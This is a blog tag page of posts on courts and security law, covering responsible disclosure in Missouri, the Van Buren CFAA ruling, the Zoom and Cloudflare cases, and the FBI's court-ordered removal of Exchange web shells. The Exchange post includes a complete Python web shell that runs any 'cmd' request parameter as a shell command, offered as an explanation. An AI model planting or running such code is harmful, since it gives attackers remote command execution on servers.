Entries Tagged "courts"


Missouri Governor Doesn’t Understand Responsible Disclosure

The Missouri governor wants to prosecute the reporter who discovered a security vulnerability in the state’s website and then reported it to the state.

The newspaper agreed to hold off publishing any story while the department fixed the problem and protected the private information of teachers around the state.

[…]

According to the Post-Dispatch, one of its reporters discovered the flaw in a web application that allowed the public to search teacher certifications and credentials. No private information was publicly visible, but teachers’ Social Security numbers were contained in the HTML source code of the pages.

The state removed the search tool after being notified of the issue by the Post-Dispatch. It was unclear how long the Social Security numbers had been vulnerable.

[…]

Chris Vickery, a California-based data security expert, told The Independent that it appears the department of education was “publishing data that it shouldn’t have been publishing.”

“That’s not a crime for the journalists discovering it,” he said. “Putting Social Security numbers within HTML, even if it’s ‘non-display rendering’ HTML, is a stupid thing for the Missouri website to do and is a type of boneheaded mistake that has been around since day one of the Internet. No exploit, hacking or vulnerability is involved here.”

In explaining how he hopes the reporter and news organization will be prosecuted, [Gov.] Parson pointed to a state statute defining the crime of tampering with computer data. Vickery said that statute wouldn’t work in this instance because of a recent decision by the U.S. Supreme Court in the case of Van Buren v. United States.
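Vickery’s point about “non-display rendering” HTML is worth spelling out: everything the server sends is part of the page source and can be read by anyone who views that source, whether or not the browser ever draws it on screen. Here is a minimal sketch of the mistake, using an entirely hypothetical page fragment and a made-up number; nothing below comes from the actual Missouri application:

```python
import re

# Illustration only: a hypothetical page fragment of the kind Vickery describes.
# The name and number are invented; the markup is not from the real application.
page_source = """
<div class="teacher-result" data-ssn="123-45-6789">  <!-- never shown on screen -->
  <span class="name">Jane Doe</span>
  <span class="status">Certificate: valid</span>
</div>
"""

# "View source" reveals everything the server delivered, rendered or not.
# No exploit, hacking, or vulnerability is needed to read it.
for ssn in re.findall(r"\d{3}-\d{2}-\d{4}", page_source):
    print("Present in the delivered HTML:", ssn)
```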

One hopes that someone will calm the governor down.

Brian Krebs has more.

EDITED TO ADD (11/12): The governor doubled down a few days later.

Posted on October 18, 2021 at 6:20 AM

Suing Infrastructure Companies for Copyright Violations

It’s a matter of going after those with deep pockets. From Wired:

Cloudflare was sued in November 2018 by Mon Cheri Bridals and Maggie Sottero Designs, two wedding dress manufacturers and sellers that alleged Cloudflare was guilty of contributory copyright infringement because it didn’t terminate services for websites that infringed on the dressmakers’ copyrighted designs….

[Judge] Chhabria noted that the dressmakers have been harmed “by the proliferation of counterfeit retailers that sell knock-off dresses using the plaintiffs’ copyrighted images” and that they have “gone after the infringers in a range of actions, but to no avail—every time a website is successfully shut down, a new one takes its place.” Chhabria continued, “In an effort to more effectively stamp out infringement, the plaintiffs now go after a service common to many of the infringers: Cloudflare. The plaintiffs claim that Cloudflare contributes to the underlying copyright infringement by providing infringers with caching, content delivery, and security services. Because a reasonable jury could not—at least on this record—conclude that Cloudflare materially contributes to the underlying copyright infringement, the plaintiffs’ motion for summary judgment is denied and Cloudflare’s motion for summary judgment is granted.”

I was an expert witness for Cloudflare in this case, basically explaining to the court how the service works.

Posted on October 13, 2021 at 9:47 AM

ProtonMail Now Keeps IP Logs

After being compelled by a Swiss court to monitor IP logs for a particular user, ProtonMail no longer claims that “we do not keep any IP logs.”

EDITED TO ADD (9/14): This seems to be more complicated. ProtonMail is not yet saying that they keep logs. Their privacy policy still states that they do not keep logs except in certain circumstances, and outlines those circumstances. And ProtonMail’s warrant canary has an interesting list of data orders they have received from various authorities, whether they complied, and why or why not.

Posted on September 10, 2021 at 6:10 AM

Zoom Lied about End-to-End Encryption

The facts aren’t news, but Zoom will pay $85M—to the class-action attorneys, and to users—for lying to users about end-to-end encryption, and for giving user data to Facebook and Google without consent.

The proposed settlement would generally give Zoom users $15 or $25 each and was filed Saturday at US District Court for the Northern District of California. It came nine months after Zoom agreed to security improvements and a “prohibition on privacy and security misrepresentations” in a settlement with the Federal Trade Commission, but the FTC settlement didn’t include compensation for users.

Posted on August 5, 2021 at 6:25 AM

Risks of Evidentiary Software

Over at Lawfare, Susan Landau has an excellent essay on the risks posed by software used to collect evidence (a Breathalyzer is probably the most obvious example).

Bugs and vulnerabilities can lead to inaccurate evidence, but the proprietary nature of software makes it hard for defendants to examine it.

The software engineers proposed a three-part test. First, the court should have access to the “Known Error Log,” which should be part of any professionally developed software project. Next, the court should consider whether the evidence being presented could be materially affected by a software error. Ladkin and his co-authors noted that a chain of emails back and forth is unlikely to have such an error, but the time that a software tool logs when an application was used could easily be incorrect. Finally, the reliability experts recommended seeing whether the code adheres to an industry standard used in a non-computerized version of the task (e.g., bookkeepers always record every transaction, and thus so should bookkeeping software).

[…]

Inanimate objects have long served as evidence in courts of law: the door handle with a fingerprint, the glove found at a murder scene, the Breathalyzer result that shows a blood alcohol level three times the legal limit. But the last of those examples is substantively different from the other two. Data from a Breathalyzer is not the physical entity itself, but rather a software calculation of the level of alcohol in the breath of a potentially drunk driver. As long as the breath sample has been preserved, one can always go back and retest it on a different device.

What happens if the software makes an error and there is no sample to check or if the software itself produces the evidence? At the time of our writing the article on the use of software as evidence, there was no overriding requirement that law enforcement provide a defendant with the code so that they might examine it themselves.

[…]

Given the high rate of bugs in complex software systems, my colleagues and I concluded that when computer programs produce the evidence, courts cannot assume that the evidentiary software is reliable. Instead the prosecution must make the code available for an “adversarial audit” by the defendant’s experts. And to avoid problems in which the government doesn’t have the code, government procurement contracts must include delivery of source code—code that is more or less readable by people—for every version of the code or device.

Posted on June 29, 2021 at 9:12 AM

The Supreme Court Narrowed the CFAA

In a 6-3 ruling, the Supreme Court just narrowed the scope of the Computer Fraud and Abuse Act:

In a ruling delivered today, the court sided with Van Buren and overturned his 18-month conviction.

In a 37-page opinion written and delivered by Justice Amy Coney Barrett, the court explained that the “exceeds authorized access” language was, indeed, too broad.

Justice Barrett said the clause was effectively making criminals of most US citizens who ever used a work resource to perform unauthorized actions, such as updating a dating profile, checking sports scores, or paying bills at work.

What today’s ruling means is that the CFAA cannot be used to prosecute rogue employees who have legitimate access to work-related resources, who will need to be prosecuted under different charges.

The ruling does not apply to former employees accessing their old work systems because their access has been revoked and they’re not “authorized” to access those systems anymore.

More.

It’s a good ruling, and one that will benefit security researchers. But the confusing part is footnote 8:

For present purposes, we need not address whether this inquiry turns only on technological (or “code-based”) limitations on access, or instead also looks to limits contained in contracts or policies.

It seems to me that this is exactly what the ruling does address. The court overturned the conviction because the defendant was not limited by technology, but only by policies. So that footnote doesn’t make any sense.

I have written about this general issue before, in the context of adversarial machine learning research.

Posted on June 7, 2021 at 6:09 AM

The FBI Is Now Securing Networks Without Their Owners’ Permission

In January, we learned about a Chinese espionage campaign that exploited four zero-days in Microsoft Exchange. One of the characteristics of the campaign, in the later days when the Chinese probably realized that the vulnerabilities would soon be fixed, was to install a web shell in compromised networks that would give them subsequent remote access. Even if the vulnerabilities were patched, the shell would remain until the network operators removed it.
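To make clear what a web shell is: it is just a small file left behind on the compromised server that turns incoming web requests into commands, so the attackers keep remote access even after the original vulnerability is patched. The shells in the Exchange campaign were ASPX files on the Exchange servers themselves; the following is only a conceptual sketch in Python, with an invented port and parameter name, to show the idea:

```python
# Conceptual sketch of a web shell, not the actual Exchange implants.
# A tiny handler like this, left behind on a server, keeps granting remote
# command execution until an operator notices and removes the file.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
import subprocess

class Shell(BaseHTTPRequestHandler):
    def do_GET(self):
        # Whatever arrives in ?cmd=... is run on the host and the output returned.
        cmd = parse_qs(urlparse(self.path).query).get("cmd", [""])[0]
        output = subprocess.run(cmd, shell=True, capture_output=True).stdout
        self.send_response(200)
        self.end_headers()
        self.wfile.write(output)

# Anyone who knows the URL -- the original attacker or an opportunistic
# criminal -- can now use it.
HTTPServer(("", 8080), Shell).serve_forever()
```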

Now, months later, many of those shells are still in place. And they’re being used by criminal hackers as well.

On Tuesday, the FBI announced that it had obtained a court order to remove “hundreds” of these web shells from networks in the US.

This is nothing short of extraordinary, and I can think of no real-world parallel. It’s kind of like if a criminal organization infiltrated a door-lock company and surreptitiously added a master passkey feature, and then customers bought and installed those locks. And then if the FBI got a court order to fix all the locks to remove the master passkey capability. And it’s kind of not like that. In any case, it’s not what we normally think of when we think of a warrant. The links above have details, but I would like a legal scholar to weigh in on the implications of this.

Posted on April 14, 2021 at 9:56 AM

The Legal Risks of Security Research

Sunoo Park and Kendra Albert have published “A Researcher’s Guide to Some Legal Risks of Security Research.”

From a summary:

Such risk extends beyond anti-hacking laws, implicating copyright law and anti-circumvention provisions (DMCA §1201), electronic privacy law (ECPA), and cryptography export controls, as well as broader legal areas such as contract and trade secret law.

Our Guide gives the most comprehensive presentation to date of this landscape of legal risks, with an eye to both legal and technical nuance. Aimed at researchers, the public, and technology lawyers alike, it aims both to provide pragmatic guidance to those navigating today’s uncertain legal landscape, and to provoke public debate towards future reform.

Comprehensive, and well worth reading.

Here’s a Twitter thread by Kendra.

Posted on October 30, 2020 at 9:14 AM

Reverse-Engineering the Redactions in the Ghislaine Maxwell Deposition

Slate magazine was able to cleverly read the Ghislaine Maxwell deposition and reverse-engineer many of the redacted names.

We’ve long known that redacting is hard in the modern age, but most of the failures to date have been a result of not realizing that covering digital text with a black bar doesn’t always remove the text from the underlying digital file. As far as I know, this reverse-engineering technique is new.
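The older failure mode is easy to demonstrate. A minimal sketch, assuming a hypothetical badly-redacted.pdf whose text was merely covered with a drawn black rectangle, and using the PyMuPDF library (this is not what Slate did, just the familiar mistake described above):

```python
# Minimal sketch of the long-known redaction failure: drawing a black box over
# text hides it on screen but leaves the text in the PDF's content stream.
# The file name is hypothetical; PyMuPDF is installed with `pip install pymupdf`.
import fitz  # PyMuPDF

doc = fitz.open("badly-redacted.pdf")
for page in doc:
    # get_text() returns the underlying text layer, including anything that was
    # only covered by an opaque shape rather than actually removed.
    print(page.get_text())
```

Proper redaction tools delete the text itself rather than just drawing a box over it.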

EDITED TO ADD: A similar technique was used in 1991 to recover the Dead Sea Scrolls.

Posted on October 27, 2020 at 6:34 AM
